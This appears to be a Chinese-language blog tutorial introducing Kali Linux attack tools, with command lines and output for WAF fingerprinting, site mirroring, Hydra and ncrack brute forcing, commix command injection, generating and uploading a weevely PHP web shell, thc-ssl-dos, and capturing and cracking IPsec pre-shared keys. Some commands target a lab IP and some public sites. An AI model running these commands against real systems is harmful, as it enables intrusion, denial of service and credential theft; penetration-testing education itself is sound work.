kali工具集介绍
工具目录
0x01.路由扫描工具
hping3
有些域名不允许济宁ping操作,使用hping3就可以确定在线目标
hping3使用SYN标识集的TCP发送ping命令
将数据发送到80端口,这样端口很少被屏蔽
0x02.WAP检测
wafw00f
┌──(root💀kali)-[~]
└─# wafw00f www.baidu.com 1 ⚙
______
/ \
( Woof! )
\ ____/ )
,, ) (_
.-. - _______ ( |__|
()``; |==|_______) .)|__|
/ (' /|\ ( |__|
( / ) / | \ . |__|
\(_)_)) / | \ |__|
~ WAFW00F : v2.1.0 ~
The Web Application Firewall Fingerprinting Toolkit
[*] Checking https://www.baidu.com
[+] Generic Detection results:
[*] The site https://www.baidu.com seems to be behind a WAF or some sort of security solution
[~] Reason: The server header is different when an attack is detected.
The server header for a normal response is "BWS/1.1", while the server header a response to an attack is "Apache",
[~] Number of requests:
结果百度翻译
0x03.镜像网站
httrack
使用这条命令可以对指定的网站进行复刻,生成镜像网站源码文件
httrack http://www.example.com/ -O output(输出目录)
Bytes saved: 1,41MiB Links scanned: 7/64 (+11)
Time: 7s Files written: 16
Transfer rate: 910B/s (11,76KiB/s) Files updated: 14
Active connections: 0 Errors: 0
Current job: waiting (throttle)
ready - 192.168.3.29/plane3/js/ 691B / 691B
* 192.168.3.29/plane3/images/home_42.jpg (562 bytes) - OK
0x04.暴力破解工具
Hydra-GTK
gtk是图形化界面,操作也和简单,通常是导入字典,对指定网站进行暴力破解
包括FTP、FTPS、HTTP、HTTPS、ICQ、IRC、LDAP、MySQL、Oracle、POP3、pcAnywhere、SNMP、SSH、VNC等服务
0x05.OS命令行注入
commix
commix是一款python编写的自动化工具,如果注入成功,则可以执行各种OS命令
使用commix -h可以查看所有功能
示例:
commix -url="http://192.168.3.29/plane3/adm/html/plane.html" -data="target_host=127.0.0.1" -headers="Accept-Language:fr\nETAG:123\n"
0x06.PHP网络外壳
Weevely
weevely是一款比较流行的php网络外壳小程序,可以模拟远程会话。
┌──(root💀kali)-[~]
└─# weevely
[+] weevely 4.0.1
[!] Error: the following arguments are required: url, password
[+] Run terminal or command on the target
weevely <URL> <password> [cmd]
[+] Recover an existing session
weevely session <path> [cmd]
[+] Generate new agent
weevely generate <password> <path>
生成木马文件
┌──(root💀kali)-[~]
└─# weevely generate 1234 /root/output/192.168.3.29/plane3/php/adm_login.html
Generated '/root/output/192.168.3.29/plane3/php/adm_login.html' with password '1234' of 781 byte size.
将生成的木马文件上传到指定网站上
使用下面命令创建会话
weevely <URL> <password> [cmd]
0x07.高速验证破解工具
ncrack
支持FTP、HTTP(s)、POP3、RDP、SMB、SSH、Telnet、VNC协议
ncrack -vv -U user.lst(字典) -P password.lst <IP:port>
0x08.SSL检测漏洞工具
testssl
下载testssl,网址:https://testssl.sh/testssl.sh
下载后使用chmod更改权限
chmod 777 testssl.sh
对https网址进行检测
./testssl.sh https://fanyi.baidu.com/
如果出现这个错误
./testssl.sh:行272: 警告:setlocale:LC_COLLATE:无法改变区域选项 (en_US.UTF-8):没有那个文件或目录
ATTENTION: No cipher mapping file found!
Please note from 2.9 on testssl.sh needs files in "$TESTSSL_INSTALL_DIR/etc/" to function correctly.
Type "yes" to ignore this warning and proceed at your own risk -->
解决办法:
下载2.6版本即可,也是进入https://testssl.sh/网址,然后选择2.6进行下载,即可成功
┌──(root💀kali)-[~/桌面]
└─# ./testssl.sh https://fanyi.baidu.com/ 255 ⨯
No mapping file found
No engine or GOST support via engine with your /usr/bin/openssl
###########################################################
testssl.sh 2.7dev from https://testssl.sh/dev/
(1.396a 2016/09/29 23:12:09)
This program is free software. Distribution and
modification under GPLv2 permitted.
USAGE w/o ANY WARRANTY. USE IT AT YOUR OWN RISK!
Please file bugs @ https://testssl.sh/bugs/
###########################################################
Using "OpenSSL 1.1.1k 25 Mar 2021" [~162 ciphers] on
kali:/usr/bin/openssl
(built: "Mar 25 20:49:34 2021", platform: "debian-amd64")
Testing now (2021-07-26 20:31) ---> 110.242.68.186:443 (fanyi.baidu.com) <---
rDNS (110.242.68.186): --
Service detected: HTTP
.....
.....
0x09.SSL测试
thc-ssl-dos
┌──(root💀kali)-[~/桌面]
└─# thc-ssl-dos --accept 192.168.3.29 80
______________ ___ _________
\__ ___/ | \ \_ ___ \
| | / ~ \/ \ \/
| | \ Y /\ \____
|____| \___|_ / \______ /
\/ \/
http://www.thc.org
Twitter @hackerschoice
Greetingz: the french underground
Waiting for script kiddies to piss off................
The force is with those who read the source...
Handshakes 0 [0.00 h/s], 1 Conn, 0 Err
SSL: error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol
#12: This does not look like SSL!
0x0A.VPN网关扫描
ike-scan
1.识别是否为VPN网关
┌──(root💀kali)-[~/桌面]
└─# ike-scan -M 192.168.3.1
Starting ike-scan 1.9.4 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
Ending ike-scan 1.9.4: 1 hosts scanned in 2.441 seconds (0.41 hosts/sec). 0 returned handshake; 0 returned notify
再返回的数据中:
0 returned handshake(返回握手); 0 returned notify (返回通知) 表明目标不是一个IPsec网关
0 returned handshake(返回握手); 1 returned notify (返回通知) 表明VPN网关存在,但所有的ike-scan提供的变换都不可接收
1 returned handshake(返回握手); 0 returned notify (返回通知) 表明目标配置了IPsec,并将对一个或多个提供给他的变换执行IKE协商
2.识别VPN网关指纹
ike-scan -M --showbackoff 192.168.3.1
3.截获预共享密钥
把结果封装为文本文件,用于附加分析、离线密码破解
ike-scan -M -A -Ppsk-hash -d <target>
4.执行离线PSK破解
psk-crack -d xxx.txt(截获的文件) psk-hash